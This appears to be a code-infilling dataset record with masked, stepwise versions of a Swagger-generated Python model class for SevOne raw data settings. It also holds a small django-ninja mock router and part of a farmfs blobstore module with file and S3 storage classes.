"step-1": "<mask token>\n\n\nclass RawDataSettingsV1(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, data_aggregation_setting=None, raw_data_setting=None,\n units_setting=None, work_hours_setting=None):\n \"\"\"RawDataSettingsV1 - a model defined in Swagger\"\"\"\n self._data_aggregation_setting = None\n self._raw_data_setting = None\n self._units_setting = None\n self._work_hours_setting = None\n self.discriminator = None\n if data_aggregation_setting is not None:\n self.data_aggregation_setting = data_aggregation_setting\n if raw_data_setting is not None:\n self.raw_data_setting = raw_data_setting\n if units_setting is not None:\n self.units_setting = units_setting\n if work_hours_setting is not None:\n self.work_hours_setting = work_hours_setting\n <mask token>\n <mask token>\n\n @property\n def raw_data_setting(self):\n \"\"\"Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: RawDataSettingV1\n \"\"\"\n return self._raw_data_setting\n <mask token>\n\n @property\n def units_setting(self):\n \"\"\"Gets the units_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The units_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: UnitsSetting\n \"\"\"\n return self._units_setting\n\n @units_setting.setter\n def units_setting(self, units_setting):\n \"\"\"Sets the units_setting of this RawDataSettingsV1.\n\n\n :param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501\n :type: UnitsSetting\n \"\"\"\n self._units_setting = units_setting\n\n @property\n def work_hours_setting(self):\n \"\"\"Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: WorkHoursSetting\n \"\"\"\n return self._work_hours_setting\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RawDataSettingsV1):\n return False\n return self.__dict__ == other.__dict__\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass RawDataSettingsV1(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, data_aggregation_setting=None, raw_data_setting=None,\n units_setting=None, work_hours_setting=None):\n \"\"\"RawDataSettingsV1 - a model defined in Swagger\"\"\"\n self._data_aggregation_setting = None\n self._raw_data_setting = None\n self._units_setting = None\n self._work_hours_setting = None\n self.discriminator = None\n if data_aggregation_setting is not None:\n self.data_aggregation_setting = data_aggregation_setting\n if raw_data_setting is not None:\n self.raw_data_setting = raw_data_setting\n if units_setting is not None:\n self.units_setting = units_setting\n if work_hours_setting is not None:\n self.work_hours_setting = work_hours_setting\n\n @property\n def data_aggregation_setting(self):\n \"\"\"Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: DataAggregationSetting\n \"\"\"\n return self._data_aggregation_setting\n\n @data_aggregation_setting.setter\n def data_aggregation_setting(self, data_aggregation_setting):\n \"\"\"Sets the data_aggregation_setting of this RawDataSettingsV1.\n\n\n :param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :type: DataAggregationSetting\n \"\"\"\n self._data_aggregation_setting = data_aggregation_setting\n\n @property\n def raw_data_setting(self):\n \"\"\"Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: RawDataSettingV1\n \"\"\"\n return self._raw_data_setting\n\n @raw_data_setting.setter\n def raw_data_setting(self, raw_data_setting):\n \"\"\"Sets the raw_data_setting of this RawDataSettingsV1.\n\n\n :param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :type: RawDataSettingV1\n \"\"\"\n self._raw_data_setting = raw_data_setting\n\n @property\n def units_setting(self):\n \"\"\"Gets the units_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The units_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: UnitsSetting\n \"\"\"\n return self._units_setting\n\n @units_setting.setter\n def units_setting(self, units_setting):\n \"\"\"Sets the units_setting of this RawDataSettingsV1.\n\n\n :param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501\n :type: UnitsSetting\n \"\"\"\n self._units_setting = units_setting\n\n @property\n def work_hours_setting(self):\n \"\"\"Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: WorkHoursSetting\n \"\"\"\n return self._work_hours_setting\n\n @work_hours_setting.setter\n def work_hours_setting(self, work_hours_setting):\n \"\"\"Sets the work_hours_setting of this RawDataSettingsV1.\n\n\n :param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :type: WorkHoursSetting\n \"\"\"\n self._work_hours_setting = work_hours_setting\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n if issubclass(RawDataSettingsV1, dict):\n for key, value in self.items():\n result[key] = value\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RawDataSettingsV1):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-3": "<mask token>\n\n\nclass RawDataSettingsV1(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {'data_aggregation_setting': 'DataAggregationSetting',\n 'raw_data_setting': 'RawDataSettingV1', 'units_setting':\n 'UnitsSetting', 'work_hours_setting': 'WorkHoursSetting'}\n attribute_map = {'data_aggregation_setting': 'dataAggregationSetting',\n 'raw_data_setting': 'rawDataSetting', 'units_setting':\n 'unitsSetting', 'work_hours_setting': 'workHoursSetting'}\n\n def __init__(self, data_aggregation_setting=None, raw_data_setting=None,\n units_setting=None, work_hours_setting=None):\n \"\"\"RawDataSettingsV1 - a model defined in Swagger\"\"\"\n self._data_aggregation_setting = None\n self._raw_data_setting = None\n self._units_setting = None\n self._work_hours_setting = None\n self.discriminator = None\n if data_aggregation_setting is not None:\n self.data_aggregation_setting = data_aggregation_setting\n if raw_data_setting is not None:\n self.raw_data_setting = raw_data_setting\n if units_setting is not None:\n self.units_setting = units_setting\n if work_hours_setting is not None:\n self.work_hours_setting = work_hours_setting\n\n @property\n def data_aggregation_setting(self):\n \"\"\"Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: DataAggregationSetting\n \"\"\"\n return self._data_aggregation_setting\n\n @data_aggregation_setting.setter\n def data_aggregation_setting(self, data_aggregation_setting):\n \"\"\"Sets the data_aggregation_setting of this RawDataSettingsV1.\n\n\n :param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :type: DataAggregationSetting\n \"\"\"\n self._data_aggregation_setting = data_aggregation_setting\n\n @property\n def raw_data_setting(self):\n \"\"\"Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: RawDataSettingV1\n \"\"\"\n return self._raw_data_setting\n\n @raw_data_setting.setter\n def raw_data_setting(self, raw_data_setting):\n \"\"\"Sets the raw_data_setting of this RawDataSettingsV1.\n\n\n :param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :type: RawDataSettingV1\n \"\"\"\n self._raw_data_setting = raw_data_setting\n\n @property\n def units_setting(self):\n \"\"\"Gets the units_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The units_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: UnitsSetting\n \"\"\"\n return self._units_setting\n\n @units_setting.setter\n def units_setting(self, units_setting):\n \"\"\"Sets the units_setting of this RawDataSettingsV1.\n\n\n :param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501\n :type: UnitsSetting\n \"\"\"\n self._units_setting = units_setting\n\n @property\n def work_hours_setting(self):\n \"\"\"Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: WorkHoursSetting\n \"\"\"\n return self._work_hours_setting\n\n @work_hours_setting.setter\n def work_hours_setting(self, work_hours_setting):\n \"\"\"Sets the work_hours_setting of this RawDataSettingsV1.\n\n\n :param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :type: WorkHoursSetting\n \"\"\"\n self._work_hours_setting = work_hours_setting\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n if issubclass(RawDataSettingsV1, dict):\n for key, value in self.items():\n result[key] = value\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RawDataSettingsV1):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-4": "<mask token>\nimport pprint\nimport re\nimport six\nfrom swagger_client.models.data_aggregation_setting import DataAggregationSetting\nfrom swagger_client.models.raw_data_setting_v1 import RawDataSettingV1\nfrom swagger_client.models.units_setting import UnitsSetting\nfrom swagger_client.models.work_hours_setting import WorkHoursSetting\n\n\nclass RawDataSettingsV1(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {'data_aggregation_setting': 'DataAggregationSetting',\n 'raw_data_setting': 'RawDataSettingV1', 'units_setting':\n 'UnitsSetting', 'work_hours_setting': 'WorkHoursSetting'}\n attribute_map = {'data_aggregation_setting': 'dataAggregationSetting',\n 'raw_data_setting': 'rawDataSetting', 'units_setting':\n 'unitsSetting', 'work_hours_setting': 'workHoursSetting'}\n\n def __init__(self, data_aggregation_setting=None, raw_data_setting=None,\n units_setting=None, work_hours_setting=None):\n \"\"\"RawDataSettingsV1 - a model defined in Swagger\"\"\"\n self._data_aggregation_setting = None\n self._raw_data_setting = None\n self._units_setting = None\n self._work_hours_setting = None\n self.discriminator = None\n if data_aggregation_setting is not None:\n self.data_aggregation_setting = data_aggregation_setting\n if raw_data_setting is not None:\n self.raw_data_setting = raw_data_setting\n if units_setting is not None:\n self.units_setting = units_setting\n if work_hours_setting is not None:\n self.work_hours_setting = work_hours_setting\n\n @property\n def data_aggregation_setting(self):\n \"\"\"Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: DataAggregationSetting\n \"\"\"\n return self._data_aggregation_setting\n\n @data_aggregation_setting.setter\n def data_aggregation_setting(self, data_aggregation_setting):\n \"\"\"Sets the data_aggregation_setting of this RawDataSettingsV1.\n\n\n :param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :type: DataAggregationSetting\n \"\"\"\n self._data_aggregation_setting = data_aggregation_setting\n\n @property\n def raw_data_setting(self):\n \"\"\"Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: RawDataSettingV1\n \"\"\"\n return self._raw_data_setting\n\n @raw_data_setting.setter\n def raw_data_setting(self, raw_data_setting):\n \"\"\"Sets the raw_data_setting of this RawDataSettingsV1.\n\n\n :param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :type: RawDataSettingV1\n \"\"\"\n self._raw_data_setting = raw_data_setting\n\n @property\n def units_setting(self):\n \"\"\"Gets the units_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The units_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: UnitsSetting\n \"\"\"\n return self._units_setting\n\n @units_setting.setter\n def units_setting(self, units_setting):\n \"\"\"Sets the units_setting of this RawDataSettingsV1.\n\n\n :param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501\n :type: UnitsSetting\n \"\"\"\n self._units_setting = units_setting\n\n @property\n def work_hours_setting(self):\n \"\"\"Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: WorkHoursSetting\n \"\"\"\n return self._work_hours_setting\n\n @work_hours_setting.setter\n def work_hours_setting(self, work_hours_setting):\n \"\"\"Sets the work_hours_setting of this RawDataSettingsV1.\n\n\n :param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :type: WorkHoursSetting\n \"\"\"\n self._work_hours_setting = work_hours_setting\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n if issubclass(RawDataSettingsV1, dict):\n for key, value in self.items():\n result[key] = value\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RawDataSettingsV1):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-5": "# coding: utf-8\n\n\"\"\"\n SevOne API Documentation\n\n Supported endpoints by the new RESTful API # noqa: E501\n\n OpenAPI spec version: 2.1.18, Hash: db562e6\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.models.data_aggregation_setting import DataAggregationSetting # noqa: F401,E501\nfrom swagger_client.models.raw_data_setting_v1 import RawDataSettingV1 # noqa: F401,E501\nfrom swagger_client.models.units_setting import UnitsSetting # noqa: F401,E501\nfrom swagger_client.models.work_hours_setting import WorkHoursSetting # noqa: F401,E501\n\n\nclass RawDataSettingsV1(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'data_aggregation_setting': 'DataAggregationSetting',\n 'raw_data_setting': 'RawDataSettingV1',\n 'units_setting': 'UnitsSetting',\n 'work_hours_setting': 'WorkHoursSetting'\n }\n\n attribute_map = {\n 'data_aggregation_setting': 'dataAggregationSetting',\n 'raw_data_setting': 'rawDataSetting',\n 'units_setting': 'unitsSetting',\n 'work_hours_setting': 'workHoursSetting'\n }\n\n def __init__(self, data_aggregation_setting=None, raw_data_setting=None, units_setting=None, work_hours_setting=None): # noqa: E501\n \"\"\"RawDataSettingsV1 - a model defined in Swagger\"\"\" # noqa: E501\n\n self._data_aggregation_setting = None\n self._raw_data_setting = None\n self._units_setting = None\n self._work_hours_setting = None\n self.discriminator = None\n\n if data_aggregation_setting is not None:\n self.data_aggregation_setting = data_aggregation_setting\n if raw_data_setting is not None:\n self.raw_data_setting = raw_data_setting\n if units_setting is not None:\n self.units_setting = units_setting\n if work_hours_setting is not None:\n self.work_hours_setting = work_hours_setting\n\n @property\n def data_aggregation_setting(self):\n \"\"\"Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: DataAggregationSetting\n \"\"\"\n return self._data_aggregation_setting\n\n @data_aggregation_setting.setter\n def data_aggregation_setting(self, data_aggregation_setting):\n \"\"\"Sets the data_aggregation_setting of this RawDataSettingsV1.\n\n\n :param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :type: DataAggregationSetting\n \"\"\"\n\n self._data_aggregation_setting = data_aggregation_setting\n\n @property\n def raw_data_setting(self):\n \"\"\"Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: RawDataSettingV1\n \"\"\"\n return self._raw_data_setting\n\n @raw_data_setting.setter\n def raw_data_setting(self, raw_data_setting):\n \"\"\"Sets the raw_data_setting of this RawDataSettingsV1.\n\n\n :param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :type: RawDataSettingV1\n \"\"\"\n\n self._raw_data_setting = raw_data_setting\n\n @property\n def units_setting(self):\n \"\"\"Gets the units_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The units_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: UnitsSetting\n \"\"\"\n return self._units_setting\n\n @units_setting.setter\n def units_setting(self, units_setting):\n \"\"\"Sets the units_setting of this RawDataSettingsV1.\n\n\n :param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501\n :type: UnitsSetting\n \"\"\"\n\n self._units_setting = units_setting\n\n @property\n def work_hours_setting(self):\n \"\"\"Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: WorkHoursSetting\n \"\"\"\n return self._work_hours_setting\n\n @work_hours_setting.setter\n def work_hours_setting(self, work_hours_setting):\n \"\"\"Sets the work_hours_setting of this RawDataSettingsV1.\n\n\n :param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :type: WorkHoursSetting\n \"\"\"\n\n self._work_hours_setting = work_hours_setting\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(RawDataSettingsV1, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RawDataSettingsV1):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-ids": [
8,
15,
17,
18,
19
]
}
|
[
8,
15,
17,
18,
19
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@mock_post_router.get('/mock_posts', url_name='mock_post_list', summary=
'전체 mock post의 list를 반환한다', response={(200): None})
def retrieve_all_mock_posts(request):
return HTTPStatus.OK
<|reserved_special_token_1|>
<|reserved_special_token_0|>
mock_post_router = Router()
@mock_post_router.get('/mock_posts', url_name='mock_post_list', summary=
'전체 mock post의 list를 반환한다', response={(200): None})
def retrieve_all_mock_posts(request):
return HTTPStatus.OK
<|reserved_special_token_1|>
from http import HTTPStatus
from ninja import Router
mock_post_router = Router()
@mock_post_router.get('/mock_posts', url_name='mock_post_list', summary=
'전체 mock post의 list를 반환한다', response={(200): None})
def retrieve_all_mock_posts(request):
return HTTPStatus.OK
<|reserved_special_token_1|>
from http import HTTPStatus
from ninja import Router
mock_post_router = Router()
@mock_post_router.get(
"/mock_posts",
url_name="mock_post_list",
summary="전체 mock post의 list를 반환한다",
response={200: None},
)
def retrieve_all_mock_posts(request):
return HTTPStatus.OK
|
flexible
|
{
"blob_id": "dcb57ecf2c72b8ac816bb06986d80544ff97c669",
"index": 5915,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@mock_post_router.get('/mock_posts', url_name='mock_post_list', summary=\n '전체 mock post의 list를 반환한다', response={(200): None})\ndef retrieve_all_mock_posts(request):\n return HTTPStatus.OK\n",
"step-3": "<mask token>\nmock_post_router = Router()\n\n\n@mock_post_router.get('/mock_posts', url_name='mock_post_list', summary=\n '전체 mock post의 list를 반환한다', response={(200): None})\ndef retrieve_all_mock_posts(request):\n return HTTPStatus.OK\n",
"step-4": "from http import HTTPStatus\nfrom ninja import Router\nmock_post_router = Router()\n\n\n@mock_post_router.get('/mock_posts', url_name='mock_post_list', summary=\n '전체 mock post의 list를 반환한다', response={(200): None})\ndef retrieve_all_mock_posts(request):\n return HTTPStatus.OK\n",
"step-5": "from http import HTTPStatus\n\nfrom ninja import Router\n\nmock_post_router = Router()\n\n\n@mock_post_router.get(\n \"/mock_posts\",\n url_name=\"mock_post_list\",\n summary=\"전체 mock post의 list를 반환한다\",\n response={200: None},\n)\ndef retrieve_all_mock_posts(request):\n return HTTPStatus.OK\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from farmfs.fs import Path, ensure_link, ensure_readonly, ensure_symlink, ensure_copy, ftype_selector, FILE, is_readonly
from func_prototypes import typed, returned
from farmfs.util import safetype, pipeline, fmap, first, compose, invert, partial, repeater
from os.path import sep
from s3lib import Connection as s3conn, LIST_BUCKET_KEY
import re
_sep_replace_ = re.compile(sep)
@returned(safetype)
@typed(safetype)
def _remove_sep_(path):
return _sep_replace_.subn("",path)[0]
#TODO we should remove references to vol.bs.reverser, as thats leaking format information into the volume.
def reverser(num_segs=3):
"""Returns a function which takes Paths into the user data and returns csums."""
r = re.compile("((\/([0-9]|[a-f])+){%d})$" % (num_segs+1))
def checksum_from_link(link):
"""Takes a path into the userdata, returns the matching csum."""
m = r.search(safetype(link))
if (m):
csum_slash = m.group()[1:]
csum = _remove_sep_(csum_slash)
return csum
else:
raise ValueError("link %s checksum didn't parse" %(link))
return checksum_from_link
@returned(safetype)
@typed(safetype, int, int)
def _checksum_to_path(checksum, num_segs=3, seg_len=3):
segs = [ checksum[i:i+seg_len] for i in range(0, min(len(checksum), seg_len * num_segs), seg_len)]
segs.append(checksum[num_segs*seg_len:])
return sep.join(segs)
class Blobstore:
def __init__(self):
raise NotImplementedError()
class FileBlobstore:
def __init__(self, root, num_segs=3):
self.root = root
self.reverser = reverser(num_segs)
def _csum_to_name(self, csum):
"""Return string name of link relative to root"""
#TODO someday when csums are parameterized, we inject the has params here.
return _checksum_to_path(csum)
def csum_to_path(self, csum):
"""Return absolute Path to a blob given a csum"""
#TODO remove callers so we can make internal.
return Path(self._csum_to_name(csum), self.root)
def exists(self, csum):
blob = self.csum_to_path(csum)
return blob.exists()
def delete_blob(self, csum):
"""Takes a csum, and removes it from the blobstore"""
blob_path = self.csum_to_path(csum)
blob_path.unlink(clean=self.root)
def import_via_link(self, path, csum):
"""Adds a file to a blobstore via a hard link."""
blob = self.csum_to_path(csum)
duplicate = blob.exists()
if not duplicate:
ensure_link(blob, path)
ensure_readonly(blob)
return duplicate
def fetch_blob(self, remote, csum):
src_blob = remote.csum_to_path(csum)
dst_blob = self.csum_to_path(csum)
duplicate = dst_blob.exists()
if not duplicate:
ensure_copy(dst_blob, src_blob)
def link_to_blob(self, path, csum):
"""Forces path into a symlink to csum"""
new_link = self.csum_to_path(csum)
ensure_symlink(path, new_link)
ensure_readonly(path)
def blobs(self):
"""Iterator across all blobs"""
blobs = pipeline(
ftype_selector([FILE]),
fmap(first),
fmap(self.reverser),
)(self.root.entries())
return blobs
def read_handle(self):
"""Returns a file like object which has the blob's contents"""
raise NotImplementedError()
def verify_blob_checksum(self, blob):
"""Returns True when the blob's checksum matches. Returns False when there is a checksum corruption."""
path = self.csum_to_path(blob)
csum = path.checksum()
return csum != blob
def verify_blob_permissions(self, blob):
"""Returns True when the blob's permissions is read only. Returns False when the blob is mutable."""
path = self.csum_to_path(blob)
return is_readonly(path)
class S3Blobstore:
def __init__(self, bucket, prefix, access_id, secret):
self.bucket = bucket
self.prefix = prefix
self.access_id = access_id
self.secret = secret
def blobs(self):
"""Iterator across all blobs"""
def blob_iterator():
with s3conn(self.access_id, self.secret) as s3:
key_iter = s3.list_bucket(self.bucket, prefix=self.prefix+"/")
for key in key_iter:
blob = key[len(self.prefix)+1:]
yield blob
return blob_iterator
def blob_stats(self):
"""Iterator across all blobs, retaining the listing information"""
def blob_iterator():
with s3conn(self.access_id, self.secret) as s3:
key_iter = s3.list_bucket2(self.bucket, prefix=self.prefix+"/")
for head in key_iter:
blob = head[LIST_BUCKET_KEY][len(self.prefix)+1:]
head['blob'] = blob
yield head
return blob_iterator
def read_handle(self):
"""Returns a file like object which has the blob's contents"""
raise NotImplementedError()
def upload(self, csum, path):
key = self.prefix + "/" + csum
def uploader():
with path.open('rb') as f:
with s3conn(self.access_id, self.secret) as s3:
#TODO should provide pre-calculated md5 rather than recompute.
result = s3.put_object(self.bucket, key, f)
return result
http_success = lambda status_headers: status_headers[0] >=200 and status_headers[0] < 300
s3_exception = lambda e: isinstance(e, ValueError)
upload_repeater = repeater(uploader, max_tries = 3, predicate = http_success, catch_predicate = s3_exception)
return upload_repeater
|
normal
|
{
"blob_id": "4fb1ece28cd7c6e2ac3a479dcbf81ee09ba14223",
"index": 3096,
"step-1": "<mask token>\n\n\nclass FileBlobstore:\n <mask token>\n\n def _csum_to_name(self, csum):\n \"\"\"Return string name of link relative to root\"\"\"\n return _checksum_to_path(csum)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass S3Blobstore:\n\n def __init__(self, bucket, prefix, access_id, secret):\n self.bucket = bucket\n self.prefix = prefix\n self.access_id = access_id\n self.secret = secret\n\n def blobs(self):\n \"\"\"Iterator across all blobs\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket(self.bucket, prefix=self.prefix + '/'\n )\n for key in key_iter:\n blob = key[len(self.prefix) + 1:]\n yield blob\n return blob_iterator\n\n def blob_stats(self):\n \"\"\"Iterator across all blobs, retaining the listing information\"\"\"\n\n def blob_iterator():\n with s3conn(self.access_id, self.secret) as s3:\n key_iter = s3.list_bucket2(self.bucket, prefix=self.prefix +\n '/')\n for head in key_iter:\n blob = head[LIST_BUCKET_KEY][len(self.prefix) + 1:]\n head['blob'] = blob\n yield head\n return blob_iterator\n\n def read_handle(self):\n \"\"\"Returns a file like object which has the blob's contents\"\"\"\n raise NotImplementedError()\n\n def upload(self, csum, path):\n key = self.prefix + '/' + csum\n\n def uploader():\n with path.open('rb') as f:\n with s3conn(self.access_id, self.secret) as s3:\n result = s3.put_object(self.bucket, key, f)\n return result\n http_success = lambda status_headers: status_headers[0\n ] >= 200 and status_headers[0] < 300\n s3_exception = lambda e: isinstance(e, ValueError)\n upload_repeater = repeater(uploader, max_tries=3, predicate=\n http_success, catch_predicate=s3_exception)\n return upload_repeater\n",
